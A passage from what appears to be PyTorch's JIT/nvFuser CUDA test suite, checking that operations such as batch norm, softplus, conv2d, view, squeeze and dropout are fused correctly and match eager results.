graph_out = t_jit(graph_in)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
# g is now a jitted, graphed version of t.
# Runs a (jitted, graphed) -> (jitted, ungraphed) -> (jitted, graphed) sequence.
# The ops in the overall sequence should be the same as Control.
g.replay()
# graph_out is now filled with g's result. Use it as ungraphed input.
out = t_jit(graph_out)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out should now equal eager_out
self.assertEqual(graph_out, eager_out)
def _test_batch_norm_impl_index_helper(self, batch, c, hw, affine=True,
track_running_stats=True, train=True,
dtype=torch.float32):
# enabling inlining to avoid counter increment in BN forward
torch._C._debug_set_autodiff_subgraph_inlining(True)
class MyModule(torch.nn.Module):
def __init__(self, num_features=10, affine=True, track_running_stats=True):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(num_features,
1e-5,
affine=affine,
track_running_stats=track_running_stats).to(dtype=dtype)
def forward(self, x):
o = self.bn(x)
o = o * 2.0
return o
x = torch.randn(batch, c, hw, hw, dtype=torch.float, device="cuda").to(dtype=dtype).requires_grad_()
grad = torch.randint(-20, 20, (batch, c, hw, hw), device="cuda").to(dtype=dtype).div(-10)
my_module = MyModule(c, affine, track_running_stats).cuda()
ref_module = MyModule(c, affine, track_running_stats).cuda()
if not train:
my_module.eval()
ref_module.eval()
t_jit = torch.jit.script(my_module)
ref_module.load_state_dict(my_module.state_dict())
ref_x = x.detach().requires_grad_()
for i in range(0, 3):
jit_o = t_jit(x)
jit_o.backward(grad)
# TODO: remove this run?
o = ref_module(ref_x)
o.backward(grad)
has_affine = ref_module.bn.weight is not None
has_running_stats = ref_module.bn.running_mean is not None
if has_running_stats:
my_module.bn.running_mean.zero_()
my_module.bn.running_var.fill_(1.0)
ref_module.bn.running_mean.zero_()
ref_module.bn.running_var.fill_(1.0)
# Verify that when train is False, we don't have grad for weight/bias.
if has_affine and train:
my_module.bn.weight.grad.zero_()
my_module.bn.bias.grad.zero_()
ref_module.bn.weight.grad.zero_()
ref_module.bn.bias.grad.zero_()
x.grad.zero_()
ref_x.grad.zero_()
# real runs
jit_o = t_jit(x)
jit_o.backward(grad)
o = ref_module(ref_x)
o.backward(grad)
# assert forward graph fusion
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1, consider_subgraphs=True)
# assert backward graph fusion
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[0].code.grad_executor_states()[0]
.execution_plans.values())[0].graph
self.assertGraphContainsExactly(bwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
e0 = 1e-5 if dtype is not torch.half else 1e-3
e1 = 1e-4 if dtype is not torch.half else 1e-3
e2 = 1e-3 if dtype is not torch.half else 1e-2
self.assertTrue(self._compare("comparing output failed", jit_o, o, e0))
self.assertTrue(self._compare("comparing input grad failed", x.grad, ref_x.grad, e1))
# TODO: switch to welford and reduce this to 1e-5
# The 1e-3 looks bad, but we don't have welford in codegen, so numeric
# is very different between reference and codegen.
if has_affine and train:
self.assertTrue(self._compare("comparing weight grad failed",
my_module.bn.weight.grad,
ref_module.bn.weight.grad,
e2))
self.assertTrue(self._compare("comparing bias grad failed",
my_module.bn.bias.grad,
ref_module.bn.bias.grad,
e1))
if has_running_stats:
self.assertTrue(self._compare("comparing running_mean failed",
my_module.bn.running_mean,
ref_module.bn.running_mean,
e0))
self.assertTrue(self._compare("comparing running_var failed",
my_module.bn.running_var,
ref_module.bn.running_var,
e0))
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_half(self):
with torch.backends.cudnn.flags(enabled=True):
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(4, 8, 5, affine, track_running_stats, training, torch.half)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_impl_index_inner_bcast(self):
# the repro
self._test_batch_norm_impl_index_helper(2, 1, 1, False, True, True)
# running the full set
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(2, 1, 1, affine, track_running_stats, training)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_impl_index_correctness(self):
with torch.backends.cudnn.flags(enabled=True):
batch = [2, 7, 16]
channels = [4, 89, 19, 32]
hw = [1, 8, 17, 32]
# avoid tolerance failure in CI
torch.cuda.manual_seed_all(211)
# failing sizes (2, 1, 1, 1)
# failing sizes (2, 89, 8, 8) training False, track True, affine: False
for b, c, hw in itertools.product(batch, channels, hw):
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(b, c, hw, affine, track_running_stats, training)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softplus_fuser(self):
def shifted_softplus(x: torch.Tensor, shift: float):
return functional.softplus(x) - shift
jitted = torch.jit.script(shifted_softplus)
inp = torch.randn(4, 2, dtype=torch.float32, device="cuda").requires_grad_()
inp_ref = inp.detach().clone().requires_grad_()
grad = torch.randn(4, 2, dtype=torch.float32, device="cuda")
aten_o = shifted_softplus(inp_ref, 0.693147)
aten_o.backward(grad)
aten_grad = inp_ref.grad
for i in range(3):
jit_o = jitted(inp, 0.693147)
inp.grad = None # avoid accumulation on grad
jit_o.backward(grad)
jit_grad = inp.grad
assert torch.allclose(jit_o, aten_o)
assert torch.allclose(jit_grad, aten_grad)
self.assertGraphContains(jitted.graph_for(inp, 0.693147), FUSION_GROUP, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_inplace_removal(self):
def t(x: torch.Tensor):
o = torch.nn.functional.softmax(x, dim=0)
o += x
return o.relu_()
jitted = torch.jit.script(t)
inp = torch.randn(4, 2, dtype=torch.float32, device="cuda")
for i in range(3):
jit_o = jitted(inp)
graph = jitted.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
self.assertGraphContains(graph, 'aten::add', True)
self.assertGraphContains(graph, 'aten::relu', True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_conv2d_bias(self):
def t(x: torch.Tensor, w: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.conv2d(x, w, bias)
return o.relu()
jitted = torch.jit.script(t)
inp = torch.randn(4, 5, 3, 3, dtype=torch.float32, device="cuda")
weight = torch.randn(2, 5, 2, 2, dtype=torch.float32, device="cuda")
bias = torch.randn(2, dtype=torch.float32, device="cuda")
for i in range(3):
jit_o = jitted(inp, weight, bias)
graph = jitted.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
def t_not_fused(x: torch.Tensor, w: torch.Tensor):
o = torch.nn.functional.conv2d(x, w)
return o.relu()
jitted_not_fused = torch.jit.script(t_not_fused)
for i in range(3):
jit_o = jitted_not_fused(inp, weight)
graph = jitted_not_fused.graph_for(inp)
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
self.assertGraphContains(graph, 'aten::relu', True)
def t_bias(x: torch.Tensor, w: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.conv2d(x, w, bias)
return o.relu()
jitted_bias = torch.jit.script(t_bias)
for i in range(3):
jit_o = jitted_bias(inp, weight, bias)
graph = jitted_bias.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
self.assertGraphContains(graph, 'prim::add_optional', True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_remove_output_used_only_in_dtype(self):
class MyModule(torch.nn.Module):
def __init__(self, num_features=4):
super(MyModule, self).__init__()
self.bn0 = torch.nn.BatchNorm2d(num_features)
self.bn1 = torch.nn.BatchNorm2d(num_features)
def forward(self, x, y):
o1 = self.bn0(x)
o2 = self.bn1(y)
return torch.relu(o1 + o2)
t = MyModule(4).float().cuda()
jitted = torch.jit.script(t)
x = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
y = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
with torch.cuda.amp.autocast(True):
for i in range(5):
jit_o = jitted(x, y)
jit_o = jitted(x, y)
o = t(x, y)
self.assertTrue(torch.allclose(jit_o, o))
graph = jitted.graph_for(x, y)
self.assertGraphContains(graph, FUSION_GROUP, True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_fix_shape_expression_bn(self):
class MyModule(torch.nn.Module):
def __init__(self, num_features=4):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(num_features)
def forward(self, x, y):
out1 = self.bn(x)
out2 = out1 + y
out3 = torch.relu(out2)
return out3
t = MyModule(4).float().cuda()
jitted = torch.jit.script(t)
x = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
y = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
with torch.cuda.amp.autocast(True):
for i in range(5):
jit_o = jitted(x, y)
jit_o = jitted(x, y)
o = t(x, y)
self.assertTrue(torch.allclose(jit_o, o))
graph = jitted.graph_for(x, y)
self.assertGraphContains(graph, FUSION_GROUP, True)
def _run_fwd_helper(self, func, ops, *args):
jitted = torch.jit.script(func)
for i in range(3):
jit_o = jitted(*args)
jit_o = jitted(*args)
o = func(*args)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
graph = jitted.graph_for(*args)
self.assertGraphContains(graph, FUSION_GROUP, True)
for op in ops:
self.assertGraphContainsExactly(graph, op, 0)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sibling_fusion(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device)
y = torch.randn(2, 5, dtype=dtype, device=device)
def t(x: torch.Tensor):
o1 = x + 1.0
o2 = x * 0.5
return o1, o2
self._run_fwd_helper(t, ['aten::add', 'aten::mul'], x)
def t2(x: torch.Tensor, y: torch.Tensor):
o1 = x.sum(0)
o2 = (x * y).sum(0)
return o1, o2
self._run_fwd_helper(t2, ['aten::sum', 'aten::mul'], x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_clean_profile_ivalue(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device, requires_grad=True)
# turn on autodiff subgraph inlining
# this is to verify that we clean up profile_ivalue node out side of
# fusion code path.
torch._C._debug_set_autodiff_subgraph_inlining(True)
def t(x: torch.Tensor, flag: bool):
return torch.dropout(x, 0.5, flag)
jit_t = torch.jit.script(t)
for idx in range(5) :
out = jit_t(x, True)
graph = jit_t.graph_for(x, True)
out = jit_t(x, False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sibling_fusion_no_scalar_inputs(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device)
y = torch.randn(3, dtype=dtype, device=device)
# no tensor dependency between o1/o2, we shouldn't be fusing them
def t(x: torch.Tensor, y: torch.Tensor):
o1 = x + 1
o2 = y - 1
return o1, o2
jitted = torch.jit.script(t)
for i in range(3):
jit_o = jitted(x, y)
graph = jitted.graph_for(x, y)
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
def _bias_view_relu_helper(self, shape, output_shape, dtype, device, error):
class BiasViewRelu(torch.nn.Module):
def __init__(self):
super(BiasViewRelu, self).__init__()
self.bias = torch.nn.Parameter(torch.randn(shape, dtype=dtype, device=device), requires_grad=False)
with torch.no_grad():
self.bias.fill_(10)
def forward(self, inputs : torch.Tensor, view_shape : List[int]):
o = inputs + self.bias
o = o.view(view_shape)
return torch.relu(o)
t = BiasViewRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profiling
jit_o = t_jit(x, output_shape)
# optimization
jit_o = t_jit(x, output_shape)
# final
jit_o = t_jit(x, output_shape)
# eager - baseline
o = t(x, output_shape)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, output_shape)
# TODO: revert disabled aten::view
# has_inferred_dimension = any([dim == -1 for dim in output_shape])
has_inferred_dimension = True
if has_inferred_dimension:
# prohibit fusing when view_shape contains an inferred dimension
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0)
else:
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::view_copy', True)
def _alias_bias_view_relu_helper(self, shape, output_shape, dtype, device, error):
class BiasViewRelu(torch.nn.Module):
def __init__(self):
super(BiasViewRelu, self).__init__()
self.bias = torch.nn.Parameter(torch.randn(shape, dtype=dtype, device=device), requires_grad=False)
with torch.no_grad():
self.bias.fill_(10)
def forward(self, inputs : torch.Tensor, bias : torch.Tensor, view_shape : List[int]):
o = inputs.view(view_shape)
inputs.add_(bias)
return torch.relu(o)
t = BiasViewRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profiling
jit_o = t_jit(x.clone(), bias, output_shape)
# optimization
jit_o = t_jit(x.clone(), bias, output_shape)
# final
jit_o = t_jit(x.clone(), bias, output_shape)
# eager - baseline
o = t(x.clone(), bias, output_shape)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias, output_shape)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0)
# generate random view given original view
def _random_view(self, original_view, max_len=8, max_views=10000):
class Moves(enum.Enum):
Merge = 0
Split = 1
Broadcast = 2
ImplicitBroadcast = 3
Keep = 4
def valid(old_view, new_view):
old_view_size = reduce(operator.mul, old_view)
new_view_size = reduce(operator.mul, new_view)
return old_view_size == new_view_size
# given a random starting number, find the nearest divisor
def find_nearest_divisor(N):
if 2 >= (N - 1):
return -1
result = random.randint(2, N - 1)
while (N % result) != 0:
result += 1
return result
complete_views = set([tuple(original_view)])
to_visit = []
# empty new view, curent originaal view, start pos=0, move count = 0, last_move
to_visit.append(([], original_view, 0, [], Moves.Keep))
# depth-first search of view shapes, starting from the original view
while len(to_visit) > 0 and len(complete_views) < max_views:
new_view, old_view, odx, move_list, last_move = to_visit[-1]
to_visit.pop()
# iterate over each move type
for idx in range(len(Moves)):
state = Moves(idx)
new_view_clone = copy.deepcopy(new_view)
old_view_clone = copy.deepcopy(old_view)
new_move_list = move_list + [state]
new_odx = odx
# Update state using Move state
if state == Moves.Keep:
new_size = old_view_clone[odx]
new_view_clone.append(new_size)
new_odx += 1
elif state == Moves.Merge:
if odx + 1 < len(old_view_clone):
new_size = old_view_clone[odx] * old_view_clone[odx + 1]
new_view_clone.append(new_size)
new_odx += 2
else:
continue
elif state == Moves.Broadcast and last_move != Moves.Broadcast:
new_view_clone.append(1)
elif state == Moves.Split:
new_size = find_nearest_divisor(old_view_clone[odx])
if new_size == -1:
continue
new_view_clone.append(new_size)
old_view_clone[odx] = int(old_view[odx] / new_size)
if old_view_clone[odx] == 1:
new_odx += 1
elif state == Moves.ImplicitBroadcast:
old_view_clone.insert(odx + 1, 1)
new_size = old_view[odx] * 1
new_view_clone.append(new_size)
new_odx += 2
if new_odx < len(old_view_clone) and len(new_move_list) < max_len:
to_visit.append((new_view_clone, old_view_clone, new_odx, new_move_list, state))
elif (valid(original_view, new_view_clone)):
final_new_view = tuple(new_view_clone)
complete_views.add(final_new_view)
return list(complete_views)
# ndims - number of dimensions
# test_fn - view test function
def _view_test_generator(self, ndims, test_fn):
# create random tensor
# max value for each dimension
max_size = 10e7
max_value = max(int(pow(max_size, 1. / ndims)), 1)
sizes = [random.randint(1, max_value) for idx in range(ndims)]
x = torch.randn(sizes)
original_sizes = list(x.size())
all_views = self._random_view(original_sizes)
random.shuffle(all_views)
max_samples = 20
max_views = min(len(all_views), max_samples)
total = 0
correct = 0
# test random combinations of compatible views
for idx in range(max_views):
for jdx in range(idx + 1, max_views):
total += 1
test_fn(all_views[idx], all_views[jdx], torch.float, 'cuda', 1e-6)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view(self):
torch._C._jit_set_nvfuser_guard_mode(True)
self._bias_view_relu_helper([2, 3, 4, 5], [-1, 4, 5], torch.float, 'cuda', 1e-6)
for ndims in range(1, 5):
self._view_test_generator(ndims, self._bias_view_relu_helper)
self._alias_bias_view_relu_helper([2, 3, 4, 5], [1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_strict_fusion(self):
def success(x):
with torch.jit.strict_fusion():
return x + x + x
scripted = self.checkScript(success, (torch.rand([4], device='cuda'),))
g = torch.jit.last_executed_optimized_graph()
FileCheck().check_not("aten::add").check("prim::CudaFusionGroup").run(g)
def failure(x):
with torch.jit.strict_fusion():
return x + torch.mm(x, x) + x
with self.assertRaises(Exception) as error_out:
foo_s = torch.jit.script(failure)
foo_s(torch.rand([4, 4]))
foo_s(torch.rand([4, 4]))
fc = FileCheck().check("Found unfused operators")
fc.check("aten::mm").run(str(error_out.exception))
def _ltc_helper(self, shape, dtype, device, error, approximate=True):
# modeled after LTC linear layer
class LTC(torch.nn.Module):
def __init__(self):
super(LTC, self).__init__()
self.weight = torch.nn.Parameter(torch.randn([1024, 1024], dtype=dtype, device=device), requires_grad=False)
self.bias = torch.nn.Parameter(torch.randn([1, 1024], dtype=dtype, device=device), requires_grad=False)
def forward(self, inputs : torch.Tensor):
o = inputs.view([32768, 1024])
o = torch.mm(o, self.weight)
o = o.view([256, 128, 1024])
o = o + self.bias
o = o.view([32768, 1024])
o = o.view([256, 128, 1024])
return torch.nn.functional.gelu(o)
t = LTC()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profile/optimization runs
for i in range(3):
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x)
# TODO: revert disabled aten::view
# self.assertGraphContains(graph, FUSION_GUARD)
# self.assertGraphContains(graph, 'prim::view_copy', True)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nested_view(self):
self._ltc_helper([256, 128, 1024], torch.float, 'cuda', 1e-6)
def _bias_squeeze_relu_helper(self, shape, dtype, device, error):
class BiasSqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasSqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = inputs + bias
o = torch.squeeze(o)
return torch.relu(o)
t = BiasSqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::squeeze_copy', True)
def _alias_bias_squeeze_relu_helper(self, shape, dtype, device, error):
class BiasSqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasSqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = torch.squeeze(inputs)
inputs.add_(bias)
return torch.relu(o)
t = BiasSqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
o = t(x.clone(), bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::squeeze_copy', 0)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze(self):
self._bias_squeeze_relu_helper([1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
self._alias_bias_squeeze_relu_helper([1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
# remove this after opinfo tests are enabled
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze_zero(self):
x = torch.tensor(1.0, dtype=torch.float, device="cuda")
def squeeze_0(x: torch.Tensor):
o = x + 1.
o = torch.squeeze(o, 0)
o = o * 2.
return o
def squeeze_1(x: torch.Tensor):
o = x + 1.
o = torch.squeeze(o, -1)
o = o + .5
return o
squeeze_0_jit = torch.jit.script(squeeze_0)
self._run_helper(squeeze_0_jit, squeeze_0, x)
squeeze_1_jit = torch.jit.script(squeeze_1)
self._run_helper(squeeze_1_jit, squeeze_1, x)
def _bias_unsqueeze_relu_helper(self, shape, dtype, device, error):
class BiasUnsqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasUnsqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = inputs + bias
o = torch.unsqueeze(o, 0)
return torch.relu(o)
t = BiasUnsqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::unsqueeze_copy', True)
def _alias_bias_unsqueeze_relu_helper(self, shape, dtype, device, error):
class BiasUnsqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasUnsqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = torch.unsqueeze(inputs, 0)
inputs.add_(bias)
return torch.relu(o)
t = BiasUnsqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
o = t(x.clone(), bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::unsqueeze_copy', 0)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unsqueeze(self):
self._bias_unsqueeze_relu_helper([2, 3, 4, 5], torch.float, 'cuda', 1e-6)
self._alias_bias_unsqueeze_relu_helper([2, 3, 4, 5], torch.float, 'cuda', 1e-6)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_alias_pass_fix(self):
x = torch.randn(4, 24, 2, 2, dtype=torch.float, device="cuda")
w = torch.randn(24, 24, 1, 1, dtype=torch.float, device="cuda")
b = torch.randn(24, dtype=torch.float, device="cuda")
def t(x, w, b):
b2 = b + 1.0
o = torch.conv2d(x, w, b2)
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, w, b)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze_negative_dim(self):
x = torch.randn(4, 24, 1, 2, dtype=torch.float, device="cuda")
def t(x):
o = x + 1.0
o = o.squeeze(-2)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_singleton_fusion(self):
x = torch.randn(4, 2, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x.relu()
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_issue1445_fusion(self):
def f(t0, t1, t2, t3):
masked_input = torch.where(t1, t2, t3)
total = masked_input.sum([0, 1, 2, 3])
sizes : List[int] = []
t10 = torch.reshape(t0, sizes)
t7 = total / t10
t4 = t7.to(dtype=torch.float)
return t4
x = torch.randn(1, 1, 1, 1, device='cuda').to(dtype=torch.long)
y = torch.randn(3, 2, 1, 1, device='cuda').to(dtype=torch.bool).expand([3, 2, 1, 2])
z = torch.randn(3, 2, 1, 2, device='cuda')
w = torch.tensor(1.5, device='cuda')
f_jit = torch.jit.script(f)
for i in range(5):
out_jit = f_jit(x, y, z, w)
out = f(x, y, z, w)
self.assertEqual(out, out_jit)
self.assertGraphContainsExactly(f_jit.graph_for(x, y, z, w), FUSION_GROUP, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_disable_sibling_fuse(self):
x = torch.randn(4, 2, device="cuda")
y = torch.randn(8, device="cuda")
s = torch.tensor(1.5, device="cuda")
with nvfuser_horizontal_fusion(False):
def t(x, y, s):
o1 = x + s
o2 = y + s
return o1, o2
t_jit = torch.jit.script(t)
for i in range(5):
t_jit(x, y, s)
# sibling fusion should be disabled with the flag
self.assertGraphContainsExactly(t_jit.graph_for(x, y, s), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_build_shape_expression_native_dropout(self):
x = torch.randn(4, 2, device="cuda")
def t(x):
o, mask = torch.native_dropout(x, 0.0, True)
o1 = o.sigmoid()
o2 = mask.float().sigmoid()
return (o1, o2)
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
